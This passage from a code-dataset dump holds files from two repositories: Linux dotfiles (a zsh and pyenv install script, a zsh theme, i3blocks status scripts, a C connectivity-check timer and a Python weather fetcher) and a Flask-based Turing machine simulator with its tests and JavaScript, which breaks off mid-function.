${TMUX_CONF_FILE}\n\n# Install pyenv & pyenv virtualenv\n# =====================================================================\nPYENV_DIR=\"/home/${USERNAME}/.pyenv\"\nPYENV_URL=\"https://github.com/pyenv/pyenv.git\"\nPYENV_VIRT_URL=\"https://github.com/pyenv/pyenv-virtualenv.git\"\n\nif [ ! -d ${PYENV_DIR} ]; then\n git clone ${PYENV_URL} ${PYENV_DIR}\n mkdir -p \"${PYENV_DIR}/plugins\"\n git clone ${PYENV_VIRT_URL} \"${PYENV_DIR}/plugins/pyenv-virtualenv\"\n chown ${USERNAME}:${USERNAME} ${PYENV_DIR}\nfi\n\n# Install zsh shell\n# =====================================================================\napt-get install -y zsh\n\n# (User should change the shell manually) Change user shell\nusermod --shell /bin/zsh ${USERNAME}\n\n# Setup configuration files\nZSHRC=\"/home/${USERNAME}/.zshrc\"\ncp zsh/zshrc ${ZSHRC}\nchown ${USERNAME}:${USERNAME} ${ZSHRC}\n\n# Install oh-my-zsh plugins\nOH_MY_ZSH_DIR=\"/home/${USERNAME}/.oh-my-zsh\"\nOH_MY_ZSH_CUSTOM_DIR=\"${OH_MY_ZSH_DIR}/custom\"\nOH_MY_ZSH_PLUGIN_DIR=\"${OH_MY_ZSH_CUSTOM_DIR}/plugins\"\n\nOH_MY_ZSH_URL=\"https://github.com/robbyrussell/oh-my-zsh.git\"\n\nZSH_AUTOSUGGESTION_DIR=\"${OH_MY_ZSH_PLUGIN_DIR}/zsh-autosuggestions\"\nZSH_AUTOSUGGESTION_URL=\"https://github.com/zsh-users/zsh-autosuggestions.git\"\n\nZSH_SYNTAX_HIGHLIGHT_DIR=\"${OH_MY_ZSH_PLUGIN_DIR}/zsh-syntax-highlighting\"\nZSH_SYNTAX_HIGHLIGHT_URL=\"https://github.com/zsh-users/zsh-syntax-highlighting.git\"\n\nZSH_PYENV_DIR=\"${OH_MY_ZSH_PLUGIN_DIR}/zsh-pyenv\"\nZSH_PYENV_URL=\"https://github.com/mattberther/zsh-pyenv.git\"\n\nif [ ! -d ${OH_MY_ZSH_DIR} ]; then\n git clone ${OH_MY_ZSH_URL} ${OH_MY_ZSH_DIR}\nfi\n\ncp zsh/aliases.zsh ${OH_MY_ZSH_CUSTOM_DIR}\ncp zsh/exports.zsh ${OH_MY_ZSH_CUSTOM_DIR}\ncp zsh/robbyrussell.zsh-theme ${OH_MY_ZSH_CUSTOM_DIR}\n\nif [ ! -d ${OH_MY_ZSH_PLUGIN_DIR} ]; then\n mkdir -p ${OH_MY_ZSH_PLUGIN_DIR}\nfi\n\nif [ ! -d ${ZSH_AUTOSUGGESTION_DIR} ]; then\n git clone ${ZSH_AUTOSUGGESTION_URL} ${ZSH_AUTOSUGGESTION_DIR}\nfi\n\nif [ ! -d ${ZSH_SYNTAX_HIGHLIGHT_DIR} ]; then\n git clone ${ZSH_SYNTAX_HIGHLIGHT_URL} ${ZSH_SYNTAX_HIGHLIGHT_DIR}\nfi\n\nif [ ! -d ${ZSH_PYENV_DIR} ]; then\n git clone ${ZSH_PYENV_URL} ${ZSH_PYENV_DIR}\nfi\n\nchown -R ${USERNAME}:${USERNAME} ${OH_MY_ZSH_DIR}\n\n# Install handy tools\napt-get install -y ctags htop ncdu net-tools\n\n# Install pyenv prerequisites libraries\napt install -y \\\n\tbuild-essential libssl-dev zlib1g-dev \\\n\tlibbz2-dev libreadline-dev libsqlite3-dev \\\n\tcurl virtualenv libncursesw5-dev xz-utils \\\n\ttk-dev libxml2-dev libxmlsec1-dev libffi-dev \\\n\tliblzma-dev\n\n# Install prerequisite libraries for tegra flash\napt-get install -y \\\n\tabootimg binfmt-support binutils \\\n\tcpp device-tree-compiler dosfstools \\\n\tlbzip2 libxml2-utils nfs-kernel-server \\\n\tpython3-yaml qemu-user-static sshpass \\\n\tudev uuid-runtime whois openssl \\\n\tcpio\n" }, { "alpha_fraction": 0.6069700121879578, "alphanum_fraction": 0.6137463450431824, "avg_line_length": 24.825000762939453, "blob_id": "ea3fdaad5d35986180b95fe79aeb325afa995642", "content_id": "70ed9423905a5d12fdd577a346edf9dd7c56453b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1035, "license_type": "permissive", "max_line_length": 98, "num_lines": 40, "path": "/zsh/robbyrussell.zsh-theme", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#!/bin/zsh\n\n# Virtualenv prompt\nvenv=\"\"\nhost=\"\"\n\nfunction virtualenv_info() {\n which pyenv 2>&1 1>/dev/null\n if [[ $(echo $?) ]]; then\n venv=$(pyenv version | sed 's/ .*//g')\n fi\n}\n\nfunction hostname_info() {\n string=$(hostname -I)\n host=(`echo $string | sed 's/\\ /\\n/g'`)\n host=${host[1]}\n}\n\nfunction nvpowertool_info() {\n systemctl status nvpowertool.service 1>/dev/null 2>/dev/null\n if [ $? -eq 0 ]; then\n\tnvpowertool=\"[nvpowertool:active] \"\n else\n nvpowertool=\"\"\n fi\n}\n\nautoload -U add-zsh-hook\nadd-zsh-hook precmd virtualenv_info\nadd-zsh-hook precmd hostname_info\nadd-zsh-hook precmd nvpowertool_info\n\nPROMPT=$'%{$fg_bold[red]%}[${host}] %{$fg_bold[yellow]%}${nvpowertool}%{$fg_bold[cyan]%}(${venv})'\nPROMPT+=' %{$fg[green]%}%c%{$reset_color%} $(git_prompt_info)'\n\nZSH_THEME_GIT_PROMPT_PREFIX=\"%{$fg_bold[blue]%}git:(%{$fg[red]%}\"\nZSH_THEME_GIT_PROMPT_SUFFIX=\"%{$reset_color%} \"\nZSH_THEME_GIT_PROMPT_DIRTY=\"%{$fg[blue]%}) %{$fg[yellow]%}✗\"\nZSH_THEME_GIT_PROMPT_CLEAN=\"%{$fg[blue]%})\"\n" }, { "alpha_fraction": 0.48571428656578064, "alphanum_fraction": 0.5079365372657776, "avg_line_length": 23.19230842590332, "blob_id": "b3e4b4a06272c82572a49c809fad0b62e55bcb15", "content_id": "a5fd50535251078f2d453d30d06b226e7367402c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 642, "license_type": "permissive", "max_line_length": 144, "num_lines": 26, "path": "/i3blocks/sound/sound_info.sh", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\nVOLUME_MUTE=\"🔇\"\nVOLUME_LOW=\"🔈\"\nVOLUME_MID=\"🔉\"\nVOLUME_HIGH=\"🔊\"\nSOUND_LEVEL=$(amixer -M get Master | awk -F\"[][]\" '/%/ { print $2 }' | awk -F\"%\" 'BEGIN{tot=0; i=0} {i++; tot+=$1} END{printf(\"%s\\n\", tot/i) }')\nMUTED=$(amixer get Master | awk ' /%/{print ($NF==\"[off]\" ? 1 : 0); exit;}')\n\nICON=$VOLUME_MUTE\nif [ \"$MUTED\" = \"1\" ]\nthen\n ICON=\"$VOLUME_MUTE\"\nelse\n if [ \"$SOUND_LEVEL\" -lt 34 ]\n then\n ICON=\"$VOLUME_LOW\"\n elif [ \"$SOUND_LEVEL\" -lt 67 ]\n then\n ICON=\"$VOLUME_MID\"\n else\n ICON=\"$VOLUME_HIGH\"\n fi\nfi\n\necho \"$ICON\" \"$SOUND_LEVEL\" | awk '{ printf(\" %s:%3s%% \\n\", $1, $2) }'\n\n" }, { "alpha_fraction": 0.6896551847457886, "alphanum_fraction": 0.6945812702178955, "avg_line_length": 17.454545974731445, "blob_id": "5f7a79fda7be0e0c855a0687e034c8b1acba2d2b", "content_id": "802e7bf2e90fa227e44b6d597b8396d4df5384c6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 203, "license_type": "permissive", "max_line_length": 52, "num_lines": 11, "path": "/i3blocks/weather/Makefile", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "CC = gcc\nCFLAGS = -O2 -Wall -Wextra -Wpedantic\nLINKFLAGS = -lrt\n\n.PHONY: clean\n\nweather_signaler: weather_signaler.c\n\t$(CC) $(CFLAGS) $< -o weather_signaler $(LINKFLAGS)\n\nclean:\n\t@rm -v weather_signaler\n" }, { "alpha_fraction": 0.5249999761581421, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 12.333333015441895, "blob_id": "f18b14e82cf67b4e44f9f355140b08e3ba54d183", "content_id": "330f395d85bdebf2390ad5cf458a3f8aad3109c1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 80, "license_type": "permissive", "max_line_length": 27, "num_lines": 6, "path": "/i3blocks/sound/sound_burst.sh", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#!/bin/sh\nfor i in $(seq 1 5)\ndo\n sleep 0.2\n pkill -RTMIN+1 i3blocks\ndone\n" }, { "alpha_fraction": 0.5770012140274048, "alphanum_fraction": 0.5912230610847473, "avg_line_length": 23.127450942993164, "blob_id": "d3153aafc1f4f515d200634dce399d2914602c94", "content_id": "fa22c63b175880fae10fe34d984ac1818f46fc14", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2461, "license_type": "permissive", "max_line_length": 79, "num_lines": 102, "path": "/i3blocks/weather/weather_signaler.c", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#include <stdlib.h>\n#include <unistd.h>\n#include <signal.h>\n#include <time.h>\n#include <stdio.h>\n\n// Sleep time between daemon updates.\n#define SLEEP_TIME_S 300\n\n// Test for internet connection. Returns true if connection is established.\nstatic int test_internet_connection()\n{\n const char *cmd = \"nc -zw1 google.com 443 1> /dev/null 2>&1\";\n return !system(cmd);\n}\n\n// Signal handler for signaling the weather applet.\nstatic void timer_handler(int sig, siginfo_t *si, void *uc)\n{\n (void) sig; // Ignore parameter.\n (void) si; // Ignore parameter.\n (void) uc; // Ignore parameter.\n\n // Test for internet connection till found or 20 times.\n for (int i = 0; i < 20; ++i)\n {\n if (test_internet_connection())\n {\n // Connection established. Break out.\n break;\n }\n else\n {\n // Retry every second.\n sleep(1);\n }\n }\n\n // Signal the weather applet.\n const char *cmd = \"pkill -RTMIN+2 i3blocks\";\n if ( system(cmd) )\n {\n // Error message should be printed to stdout since stdout is the way to\n // interface with a user in i3blocks.\n puts(\"WEATHER_SIGNALER ERROR\\n\");\n }\n}\n\nint timer_init_launch(\n timer_t *timer,\n struct sigevent *sev,\n struct sigaction *sa,\n struct itimerspec *tspec)\n{\n // Event initialization.\n sev->sigev_notify = SIGEV_SIGNAL;\n sev->sigev_signo = SIGRTMIN;\n sev->sigev_value.sival_ptr = timer;\n\n // Signal action type initializaion.\n sa->sa_flags = SA_SIGINFO;\n sa->sa_sigaction = timer_handler;\n sigemptyset(&sa->sa_mask);\n if (sigaction(SIGRTMIN, sa, NULL) == -1)\n return -1;\n\n // Initialze timer.\n if (timer_create(CLOCK_BOOTTIME, sev, timer) == -1)\n return -1;\n\n // Start the timer.\n tspec->it_value.tv_sec = SLEEP_TIME_S;\n tspec->it_value.tv_nsec = 0;\n tspec->it_interval.tv_sec = SLEEP_TIME_S;\n tspec->it_interval.tv_nsec = 0;\n if (timer_settime(*timer, 0, tspec, NULL) == -1)\n return -1;\n\n // Initialization successful.\n return 0;\n}\n\nint main()\n{\n timer_t timer;\n struct sigevent sev;\n struct sigaction sa;\n struct itimerspec tspec;\n\n // Initialize signaler\n if (timer_init_launch(&timer, &sev, &sa, &tspec))\n exit(EXIT_FAILURE);\n\n // Signal on daemon launch.\n sleep(1);\n timer_handler(0, NULL, NULL);\n\n while(1)\n {\n sleep(100);\n }\n}\n" }, { "alpha_fraction": 0.5467708110809326, "alphanum_fraction": 0.5641074776649475, "avg_line_length": 41.67479705810547, "blob_id": "dc80cdd171cfc11f9855ef3690861dff437303e6", "content_id": "1fe2817ebf38f9fa333c419f3fb4ec6766f8d466", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5380, "license_type": "permissive", "max_line_length": 93, "num_lines": 123, "path": "/i3blocks/weather/weather.py", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n''' Weather acquirer for: https://github.com/miklhh/i3blocks-config '''\nimport os\nimport datetime\nimport xml.etree.ElementTree as ET\nimport requests\n\n# Forecast URL.\nYR_URL = \"https://www.yr.no/place/Sverige/%C3%96sterg%C3%B6tland/Link%C3%B6ping/forecast.xml\"\n\n# Good to have data + funky emojicons.\nFORECAST_CACHE_FILE = os.path.dirname(os.path.realpath(__file__)) + \"/forecast.xml\"\n\n# Emojis associatted with weather # Day # Night\nWEATHER_TYPES = { \"Fair\" : [\"☀️\", \"🌙\"], #pylint: disable=C0326\n \"Partly cloudy\" : [\"⛅\", \"☁️\"], #pylint: disable=C0326\n \"Clear sky\" : [\"☀️\", \"🌙\"], #pylint: disable=C0326\n \"Cloudy\" : [\"☁️\", \"☁️\"], #pylint: disable=C0326\n \"Light rain\" : [\"🌧️\", \"🌧️\"], #pylint: disable=C0326\n \"Rain\" : [\"🌧️\", \"🌧️\"], #pylint: disable=C0326\n \"Heavy Rain\" : [\"🌧️\", \"🌧️\"], #pylint: disable=C0326\n \"Light snow\" : [\"🌨️\", \"🌨️\"], #pylint: disable=C0326\n \"Snow\" : [\"🌨️\", \"🌨️\"], #pylint: disable=C0326\n \"Heavy snow\" : [\"🌨️\", \"🌨️\"], #pylint: disable=C0326\n \"Foggy\" : [\"🌫️\", \"🌫️\"], #pylint: disable=C0326\n \"Fog\" : [\"🌫️\", \"🌫️\"], #pylint: disable=C0326\n \"Light snow showers\" : [\"🌨️\", \"🌨️\"]} #pylint: disable=C0326\n\n\ndef get_xml_root():\n \"\"\" Returns a weather XML root, cached from old data if necessary. \"\"\"\n yr_response = 0\n try:\n # Request data from YR.\n yr_response = requests.get(YR_URL)\n if yr_response.status_code != 200:\n raise RuntimeError('Error: YR status code ' + str(yr_response.status_code))\n\n # New response, store in cache file and return XML root.\n with open(FORECAST_CACHE_FILE, \"w\") as file_handle:\n file_handle.write(yr_response.text)\n return ET.fromstring(yr_response.text)\n\n except requests.ConnectionError:\n # Probably just no internet. Use cached forecast.\n if os.path.isfile(FORECAST_CACHE_FILE):\n with open(FORECAST_CACHE_FILE) as file_handle:\n yr_response = file_handle.read()\n # Print recycle emoji and continue using cached forecast.\n print(\"(♻️)\", end=\" \")\n return ET.fromstring(yr_response)\n\n # Dead end, no XML-root acquired.\n raise RuntimeError('No forecast data available.')\n\n\ndef main():\n \"\"\" Entry point for program. \"\"\"\n # Get the XML root.\n try:\n xml_root = get_xml_root()\n except RuntimeError as exception:\n print(exception)\n\n # Parse the sun rise and set time. Appearntly, they are not always available and\n # so we need to make sure they exist in the recieved data.\n rise_fall_available = True\n sun_rise_time = sun_set_time = \"\"\n try:\n sun_rise_time = xml_root.find(\"sun\").attrib.get(\"rise\")\n sun_rise_time = sun_rise_time[sun_rise_time.find('T')+1 : len(sun_rise_time)-3]\n sun_set_time = xml_root.find(\"sun\").attrib.get(\"set\")\n sun_set_time = sun_set_time[sun_set_time.find('T')+1 : len(sun_set_time)-3]\n except (ET.ParseError, AttributeError):\n rise_fall_available = False\n\n # Get the current weather information.\n forecast = xml_root.find(\"forecast\").find(\"tabular\").find(\"time\")\n weather = forecast.find(\"symbol\").attrib.get(\"name\")\n temperature = forecast.find(\"temperature\").attrib.get(\"value\")\n wind_direction = forecast.find(\"windDirection\").attrib.get(\"code\")\n wind_speed = forecast.find(\"windSpeed\").attrib.get(\"mps\")\n precipitation = forecast.find(\"precipitation\").attrib.get(\"value\")\n\n # Night time?\n is_night = 0\n now = datetime.datetime.now()\n if rise_fall_available:\n # Use sun rise and fall time to determine.\n sun_rise = datetime.datetime.strptime(sun_rise_time, \"%H:%M\")\n sun_set = datetime.datetime.strptime(sun_set_time, \"%H:%M\")\n is_night = 1 if now.time() < sun_rise.time() or sun_set.time() < now.time() else 0\n else:\n # No rise/fall time available. Approximate daytime as [07:00 - 21:00].\n sun_rise = datetime.datetime.strptime(\"07:00\", \"%H:%M\")\n sun_set = datetime.datetime.strptime(\"21:00\", \"%H:%M\")\n is_night = 1 if now.time() < sun_rise.time() or sun_set.time() < now.time() else 0\n\n # Print the weather.\n if weather in WEATHER_TYPES:\n # Emoji is avaiable for usage.\n print(weather + \": \" + WEATHER_TYPES.get(weather)[is_night] + \" \", end=\"\")\n else:\n # No emoji available, use regular text.\n print(weather + \" \", end=\"\")\n\n # Print the temperature and sun times.\n print(temperature, end=\"°C \")\n\n # Print the sun rise and set time.\n if rise_fall_available:\n print(\"[\" + sun_rise_time + \" 🌅 \" + sun_set_time + \"]\", end=\" \")\n\n # Print the precipitation (if there is any).\n if precipitation != \"0\":\n # Print with a wet umbrella\n print(\"| ☔ \" + precipitation + \"mm\", end=\" \")\n\n # Print wind data.\n print(\"| 🍃 \" + wind_speed + \"m/s \" + \"(\" + wind_direction + \")\", end=\"\")\n\n# Go gadget, go!\nmain()\n" }, { "alpha_fraction": 0.5362877249717712, "alphanum_fraction": 0.5664739608764648, "avg_line_length": 34.3863639831543, "blob_id": "e927b2f9babc320a64f3a3733083c8e99f0ba584", "content_id": "6b0128c3c5a64c979a0c63efbd63574e94378939", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1562, "license_type": "permissive", "max_line_length": 116, "num_lines": 44, "path": "/i3blocks/battery/battery_info.sh", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\n# If ACPI was not installed, this probably is a battery-less computer.\nACPI_RES=$(acpi -b)\nACPI_CODE=$?\nif [ $ACPI_CODE -eq 0 ]\nthen\n # Get essential information. Due to som bug with some versions of acpi it is\n # worth filtering the ACPI result from all lines containing \"unavailable\".\n BAT_LEVEL_ALL=$(echo \"$ACPI_RES\" | grep -v \"unavailable\" | grep -E -o \"[0-9][0-9]?[0-9]?%\")\n BAT_LEVEL=$(echo \"$BAT_LEVEL_ALL\" | awk -F\"%\" 'BEGIN{tot=0;i=0} {i++; tot+=$1} END{printf(\"%d%%\\n\", tot/i)}')\n TIME_LEFT=$(echo \"$ACPI_RES\" | grep -v \"unavailable\" | grep -E -o \"[0-9]{2}:[0-9]{2}:[0-9]{2}\")\n IS_CHARGING=$(echo \"$ACPI_RES\" | grep -v \"unavailable\" | awk '{ printf(\"%s\\n\", substr($3, 0, length($3)-1) ) }')\n\n # If there is no 'time left' information (when almost fully charged) we \n # provide information ourselvs.\n if [ -z \"$TIME_LEFT\" ]\n then\n TIME_LEFT=\"00:00:00\"\n fi\n\n # Print full text. The charging data.\n TIME_LEFT=$(echo $TIME_LEFT | awk '{ printf(\"%s\\n\", substr($1, 0, 5)) }')\n echo \"🔋$BAT_LEVEL ⏳$TIME_LEFT \"\n\n # Print the short text.\n echo \"BAT: $BAT_LEVEL\"\n \n # Change the font color, depending on the situation.\n if [ \"$IS_CHARGING\" = \"Charging\" ]\n then\n # Charging yellow color.\n echo \"#D0D000\"\n else\n if [ \"${BAT_LEVEL%?}\" -le 15 ]\n then\n # Battery very low. Red color.\n echo \"#FA1E44\"\n else\n # Battery not charging but at decent level. Green color.\n echo \"#007872\"\n fi\n fi\nfi\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6770833134651184, "avg_line_length": 31, "blob_id": "d3c0b3fa15b5c58f2e55f96dcb42591d689e6217", "content_id": "32cb5afe62d2de56108e2fbca1abb42dd126eda4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 96, "license_type": "permissive", "max_line_length": 51, "num_lines": 3, "path": "/i3wm/bin/rofi_app_launcher", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n# Run rofi app launcher\ni3-dmenu-desktop --dmenu=\"rofi -dmenu -i -p 'apps'\"\n" } ]
17
aleks311001/MachineTuring
https://github.com/aleks311001/MachineTuring
984a5e40541d8137e4f61d9a562fc5621b45c9c8
1f0f4eb2ffde3829b91b5de27b8b50ab22fd7b01
cb0c1208c27ff43cd08e54edbc9923ee86c6d169
refs/heads/master
2023-03-03T10:56:55.305050
2021-02-04T21:58:49
2021-02-04T21:58:49
261,997,495
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5586034655570984, "alphanum_fraction": 0.5644222497940063, "avg_line_length": 39.550559997558594, "blob_id": "7916c7f2b59a35c95094ebb3b2b9cee1f7b7c531", "content_id": "5ad2ad8db55dea0390db6eb9433b74dc121d8881", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3609, "license_type": "no_license", "max_line_length": 120, "num_lines": 89, "path": "/test_MT.py", "repo_name": "aleks311001/MachineTuring", "src_encoding": "UTF-8", "text": "from machine_Turing import MachineTuring\nimport unittest\nimport json\n\n\nclass TestMT(unittest.TestCase):\n def setUp(self):\n self.mt = MachineTuring()\n\n def test_new_machine(self):\n data = self.mt.create_dict()\n assert data['alphabet'] == '_'\n assert data['status_alphabet'] == 'Q0'\n\n program_table = data['program_table']\n assert program_table['line_status'] == ['Q0', ]\n assert program_table['lines']['_']['cells']['Q0'] == ''\n\n assert json.loads(data['ribbon_cells'])['0'] == '_'\n assert data['pos_start'] == 0\n assert json.loads(data['moves']) == ['=', ]\n assert json.loads(data['change_symbols']) == ['_', ]\n assert json.loads(data['statuses']) == ['Q0', ]\n\n def test_load(self):\n self.mt.load('simple_test')\n\n data = self.mt.create_dict()\n assert data['alphabet'] == '_1'\n assert data['status_alphabet'] == 'Q0 Qt'\n\n program_table = data['program_table']\n assert program_table['line_status'] == ['Q0', 'Qt']\n lines = program_table['lines']\n assert lines['_']['cells']['Q0'] == '1>Qt'\n assert lines['_']['cells']['Qt'] == ''\n assert lines['1']['cells']['Q0'] == ''\n assert lines['1']['cells']['Qt'] == ''\n\n for ribbon_cell in json.loads(data['ribbon_cells']).values():\n assert ribbon_cell == '_'\n assert data['pos_start'] == 0\n assert json.loads(data['moves']) == ['=', ]\n assert json.loads(data['change_symbols']) == ['_', ]\n assert json.loads(data['statuses']) == ['Q0', ]\n\n def check_jsons(self, orig_name, test_name):\n with open(f'machines/{orig_name}.json') as original, open(f'machines/{test_name}.json') as test:\n original_mt = json.load(original)\n test_mt = json.load(test)\n assert original_mt['_alphabet'] == test_mt['_alphabet']\n assert original_mt['_status_alphabet'] == test_mt['_status_alphabet']\n assert original_mt['_program_table'] == test_mt['_program_table']\n\n for i in range(min(original_mt['_ribbon_extremum']['min_index'], test_mt['_ribbon_extremum']['min_index']),\n max(original_mt['_ribbon_extremum']['max_index'], test_mt['_ribbon_extremum']['max_index'])):\n assert original_mt['_ribbon'].get(str(i), '_') == test_mt['_ribbon'].get(str(i), '_')\n\n assert original_mt['_pos_ribbon'] == test_mt['_pos_ribbon']\n assert original_mt['_status'] == test_mt['_status']\n assert original_mt['_move'] == test_mt['_move']\n\n def test_save(self):\n self.mt.load('simple_test')\n self.mt.save('tests/test_save')\n\n self.check_jsons('simple_test', 'tests/test_save')\n\n def test_next_step(self):\n self.mt.load('simple_test')\n self.mt.next_step()\n self.mt.save('tests/next_step_simple_test')\n self.check_jsons('tests/check_next_step_simple_test', 'tests/next_step_simple_test')\n\n self.mt.load('hard_test')\n self.mt.next_step()\n self.mt.save('tests/next_step_hard_test')\n self.check_jsons('tests/check_next_step_hard_test', 'tests/next_step_hard_test')\n\n def test_start(self):\n self.mt.load('hard_test')\n self.mt.start(25)\n self.mt.save('tests/start_hard_test')\n self.check_jsons('tests/check_start_hard_test', 'tests/start_hard_test')\n\n self.mt.load('long_test')\n self.mt.start(250)\n self.mt.save('tests/start_long_test')\n self.check_jsons('tests/check_start_long_test', 'tests/start_long_test')\n" }, { "alpha_fraction": 0.5871886014938354, "alphanum_fraction": 0.5877817273139954, "avg_line_length": 19.814815521240234, "blob_id": "3fb3377f0b06941195ec81d2c0e7efd6ddabd10c", "content_id": "33cb08e5cac20d86e932f7686e34abc898de4f7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1686, "license_type": "no_license", "max_line_length": 53, "num_lines": 81, "path": "/app.py", "repo_name": "aleks311001/MachineTuring", "src_encoding": "UTF-8", "text": "from flask import Flask, redirect, request\nfrom machine_Turing import MachineTuring\nimport logging\n\napp = Flask(__name__)\nlogger = logging.getLogger(__name__)\nlogger.setLevel('INFO')\n\nmachine = MachineTuring()\n\n\[email protected]('/', methods=['GET'])\ndef get():\n return machine.render()\n\n\[email protected]('/update', methods=['POST'])\ndef update():\n try:\n machine.update_all()\n except Exception as e:\n logger.warning(e)\n return redirect('/')\n return redirect('/')\n\n\[email protected]('/start', methods=['POST'])\ndef start():\n try:\n machine.update_all()\n machine.start(int(request.form.get('steps')))\n except Exception as e:\n logger.warning(e)\n return redirect('/')\n return redirect('/')\n\n\[email protected]('/next_step', methods=['POST'])\ndef next_step():\n try:\n machine.update_all()\n machine.start(1)\n except Exception as e:\n logger.warning(e)\n return redirect('/')\n return redirect('/')\n\n\[email protected]('/save', methods=['POST'])\ndef save():\n try:\n machine.update_all()\n machine.save(request.form.get('save-load'))\n except Exception as e:\n logger.warning(e)\n return redirect('/')\n return redirect('/')\n\n\[email protected]('/load', methods=['POST'])\ndef load():\n try:\n machine.load(request.form.get('save-load'))\n except Exception as e:\n logger.warning(e)\n return redirect('/')\n return redirect('/')\n\n\[email protected]('/clear', methods=['POST'])\ndef clear():\n try:\n machine.clear()\n except Exception as e:\n logger.warning(e)\n return redirect('/')\n return redirect('/')\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n" }, { "alpha_fraction": 0.6479066610336304, "alphanum_fraction": 0.6591626405715942, "avg_line_length": 36.36410140991211, "blob_id": "cb9cd2a3a6e11803703c2c5501b8db0829e8b9cd", "content_id": "d418a2a40f42fa4c3f10189d7a37318949912269", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 7285, "license_type": "no_license", "max_line_length": 116, "num_lines": 195, "path": "/static/script.js", "repo_name": "aleks311001/MachineTuring", "src_encoding": "UTF-8", "text": "let table = document.getElementById('ribbon_machine');\nlet ribbon = table.rows[0];\nlet index_ribbon = table.rows[1];\n\ntable.style.marginLeft = '-25px';\nlet numberCellsOnDisplay = document.body.clientWidth / 55;\n\nfor (let i = 0; i < numberCellsOnDisplay; ++i) {\n addCell(i, -Math.floor(numberCellsOnDisplay / 2) + i);\n}\n\nlet widthCell = ribbon.cells[0].offsetWidth;\nlet middle = Math.floor(numberCellsOnDisplay / 2);\nlet reallyMarginLeft = parseInt(table.style.marginLeft);\n\ndrawBorrow();\ntable.style.marginTop = '-10px';\nlet timerMakeNextStepId;\ndrawAfterLoad();\nmoveAfterAdd(30);\n\nribbon.cells[middle].children[0].focus();\n\ndocument.onkeydown = checkKey;\n\nfunction addCell(real_index_ceil, write_index_ceil, default_value = null) {\n let newCell = ribbon.insertCell(real_index_ceil);\n newCell.setAttribute('class', 'cell cell-ribbon');\n\n let input = document.createElement(\"input\");\n input.setAttribute('class', 'input input-ribbon');\n input.setAttribute('type', 'text');\n input.setAttribute('maxlength', '1');\n input.setAttribute('name', 'ribbon~' + write_index_ceil);\n input.setAttribute('autocomplete', 'off');\n if (default_value != null) {\n input.setAttribute('value', default_value);\n } else {\n input.setAttribute('value', '_');\n }\n\n //inp.setAttribute('autofocus', 'autofocus');\n newCell.append(input);\n\n let newIndexCell = index_ribbon.insertCell(real_index_ceil);\n newIndexCell.setAttribute('class', 'cell index-cell-ribbon');\n newIndexCell.innerHTML = write_index_ceil;\n}\n\nfunction checkKey(e) {\n let activeParentParent = document.activeElement.parentElement.parentElement;\n if (activeParentParent === ribbon) {\n if (e.keyCode === 37) {\n moveRibbonLeft();\n } else if (e.keyCode === 39) {\n moveRibbonRight();\n }\n } else if (activeParentParent.parentElement.parentElement.parentElement ===\n document.getElementById(\"program_machine\")) {\n if (e.keyCode === 37) {\n activeParentParent.previousElementSibling.children[0].children[0].focus();\n } else if (e.keyCode === 39) {\n activeParentParent.nextElementSibling.children[0].children[0].focus();\n } else if (e.keyCode === 38) {\n let index = activeParentParent.cellIndex\n activeParentParent.parentElement.previousElementSibling.children[index].children[0].children[0].focus();\n } else if (e.keyCode === 40) {\n let index = activeParentParent.cellIndex\n activeParentParent.parentElement.nextElementSibling.children[index].children[0].children[0].focus();\n }\n }\n}\n\nfunction moveAfterAdd(delay) {\n let difference = reallyMarginLeft - parseInt(table.style.marginLeft);\n let moveVal = Math.sign(difference) * Math.ceil(Math.abs(difference) / 8);\n\n if (widthCell / 10 <= Math.abs(difference) && Math.abs(difference) <= widthCell) {\n moveVal = Math.sign(difference) * widthCell / 10;\n }\n\n table.style.marginLeft = (parseInt(table.style.marginLeft) + moveVal).toString() + 'px';\n\n setTimeout(function () {moveAfterAdd(delay);}, delay);\n}\n\nfunction moveRibbonLeft() {\n if (reallyMarginLeft / widthCell > -1) {\n addCell(0, parseInt(index_ribbon.cells[0].innerHTML) - 1);\n table.style.marginLeft = (parseInt(table.style.marginLeft) - widthCell).toString() + 'px';\n } else {\n reallyMarginLeft += widthCell;\n --middle;\n }\n //document.write(JSON.parse(table.dataset.ribbonss));\n //document.write(table.dataset.ribbonss.toString());//table.dataset.ribbonss);\n\n ribbon.cells[middle].children[0].focus();\n}\nfunction moveRibbonRight() {\n if ((document.body.clientWidth - reallyMarginLeft) / widthCell > ribbon.cells.length - 1) {\n addCell(ribbon.cells.length, parseInt(index_ribbon.cells[ribbon.cells.length - 1].innerHTML) + 1);\n }\n\n reallyMarginLeft -= widthCell;\n ++middle;\n ribbon.cells[middle].children[0].focus();\n}\n\nfunction makeNextStep(moves, change_symbols, executed, statuses, index) {\n if (index >= 